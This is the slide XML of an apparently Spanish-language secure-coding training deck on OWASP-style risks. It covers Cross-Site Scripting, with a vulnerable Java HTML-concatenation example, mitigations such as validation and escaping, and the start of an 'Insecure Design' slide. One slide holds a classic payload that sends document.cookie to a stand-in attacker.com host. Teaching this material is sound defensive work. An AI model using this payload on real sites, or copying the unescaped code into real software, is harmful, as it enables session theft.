            <a:ext cx="2963431" cy="1754326"/>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ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>2. La página web transmite al navegador de la víctima la página con la carga útil del atacante. Su navegador ejecuta el script malicioso.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Imagen 4" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED0101AA-9C8D-79F1-9C6B-499612EE2581}"/>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033311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5C06-DD95-FB29-93B7-87B5470BBB1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956E5AE-F38B-2D0F-47E4-E5B0669681BB}"/>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6F754A7-1ED3-D9B1-2774-93DEE0ACD88A}"/>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Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D02B87E3-81F3-FDA4-C9FC-E144DAA5126F}"/>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17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BFB7872-73EF-5EE6-E44D-6AE107C4A1EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688062" y="1685008"/>
            <a:ext cx="787411" cy="66182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600" b="1" dirty="0">
                <a:latin typeface="Raleway" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21A9A4E8-9A95-E854-CE98-43B4264DA623}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688062" y="3462114"/>
            <a:ext cx="787411" cy="66182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600" b="1">
                <a:latin typeface="Raleway" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBA56394-4124-27CA-12A4-79CCCC77487D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688062" y="4973740"/>
            <a:ext cx="787412" cy="66182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600" b="1" dirty="0">
                <a:latin typeface="Raleway" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="CuadroTexto 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65D04CC2-9B1C-2072-64F3-35AEFFA59FC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1928756" y="1571946"/>
            <a:ext cx="10031638" cy="1200329"/>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Una aplicación </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>utiliza datos no confiables en la construcción de código HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(String) page += "&lt;input name='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>creditcard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>' type='TEXT’ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>value='" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("CC") + "'&gt;";</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="CuadroTexto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D09CC51E-76B4-0D7C-DA33-3182B6C8EBBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1942647" y="5119985"/>
            <a:ext cx="10031638" cy="369332"/>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El </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>identificador de sesión de la víctima es enviado </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>al</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> atacante.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="CuadroTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6887717-5191-CE27-C6D6-E272D0289949}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1928756" y="3200980"/>
            <a:ext cx="10031638" cy="1477328"/>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Un atacante modifica el parámetro 'CC' en el navegador por:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = 'http://www.attacker.com/cgibin/cookie.cgi?foo = '+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 2" descr="Malo - Iconos gratis de negocios y finanzas">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C80266D-2949-31FC-E095-0DE3700AE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1428" y="1571946"/>
            <a:ext cx="852331" cy="8523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2C885219-E368-8BB4-7678-CE2B870C6FED}"/>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56888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7F225-6ACB-AD69-6091-EF4E58CF7AD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8B973CA2-E460-02CB-7DC0-36E97A06A8FA}"/>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08CFB58-0F47-F931-B6D4-80997D91FC33}"/>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Cross-Site Scripting (XSS) - Práctica</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C85AD8B0-535E-5226-9688-5BE72DE359F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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E482A52-308F-589C-E11E-B70A563ABE98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1198438" y="1385623"/>
            <a:ext cx="9741271" cy="4468690"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 4" descr="Botón Rojo Play PNG transparente - StickPNG">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{943B64CD-2ACC-470C-5F4D-552A77921E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7534" y="931610"/>
            <a:ext cx="780288" cy="78028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Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{020CF791-E2B3-665D-1D45-59BF38451A23}"/>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21280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9CF0E-ED7D-DDD9-06C6-1CA4D4216C0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2581929-335D-0A69-4E2C-0D609CE1FF6F}"/>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4A815A4-6CA9-435F-FBCC-936EF3D9264C}"/>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Medidas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{646DFDE2-4835-ECED-9E7A-A950F3BD699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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5D8773B-CBB5-BF9B-2B51-6D846A16B9B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4163919" y="4884402"/>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5" name="Oval 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AFB4E5D-BD9D-57CE-B284-451635BE55CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4163919" y="2383634"/>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7" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3C79477-C9B7-C04F-7BFC-770521ADD5C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5430993" y="1296393"/>
            <a:ext cx="5806420" cy="369332"/>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Emplear </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>librería de validación autorizada</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFAB1476-A8CA-F4C1-747B-463910EFD4BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5440784" y="2485726"/>
            <a:ext cx="5686722"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Validar de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>todos los datos de entrada. No incorporar de manera dinámica sin filtrar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ningún dato a código o consulta SQL.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBB8858E-BD57-B6B9-E059-5CAAA962EDA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5440269" y="5113686"/>
            <a:ext cx="6039251" cy="369332"/>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Los datos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rechazados no se utilizan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2230B0FD-21AB-B9F3-7CDF-89550D2B3DCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4163919" y="1174289"/>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11" name="Imagen 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A46856DC-327E-8765-2398-D98C9554A3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7473" y="5111814"/>
            <a:ext cx="646331" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="004C41"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Imagen 11" descr="Icono&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B37F0BE-2ABC-07E0-EC75-67E9ED6AE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2373" y="2688516"/>
            <a:ext cx="609600" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="004C41"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Imagen 12" descr="Imagen en blanco y negro&#10;&#10;Descripción generada automáticamente con confianza media">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CB8E285-53A7-53D5-4A9D-0E3D51EE354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13" y="1136400"/>
            <a:ext cx="3358476" cy="4927639"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Oval 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D041D5B-4372-8AE0-5FAC-F51746C03F15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4163919" y="3664241"/>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1600" b="1">
                <a:latin typeface="Raleway" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C989E7C-8096-2598-6686-1A4FB70DFB9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5440784" y="3903310"/>
            <a:ext cx="5608382"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Hacer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>escape de caracteres </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTML o peligrosos (‘&lt;‘, ‘&gt;’, ’ %’, ‘&amp;’, ‘\’. ‘/’…</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Imagen 15" descr="Icono&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDB0019C-BB91-8D07-481E-2AD4B3240E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2373" y="1360979"/>
            <a:ext cx="731520" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Imagen 2" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{605250FE-02E0-3C51-6DA7-9153BE83AF51}"/>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64222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AA17F-F937-5FDE-2F6B-20748B1129C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AFE1538F-F5D9-CDF7-0787-CF4687A70BA9}"/>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89F0EC4-9BA2-A9EE-4799-14C7CF6DC2EA}"/>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04. Diseño Inseguro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5491B7CF-9E35-D63F-48DD-5B447426ECC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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0427EFDF-3E2C-37E4-4A6C-31D7EA73B2E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="598094" y="4437535"/>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3" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D5DBCD1-B19F-E98C-7E4B-F148E4712D2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="598094" y="1361126"/>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7" name="Oval 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9BA04B6-D352-B3CD-0735-17D69B68F116}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="598094" y="289670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9" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{511421EF-0D43-37AC-2820-AE4DC79ABDC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2251158" y="1479515"/>
            <a:ext cx="5477047"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Representa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> muchas debilidades diferentes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, expresadas como "diseño de control ausente o ineficaz". </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ausencia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> de controles. </a:t>
            </a:r>
          </a:p>
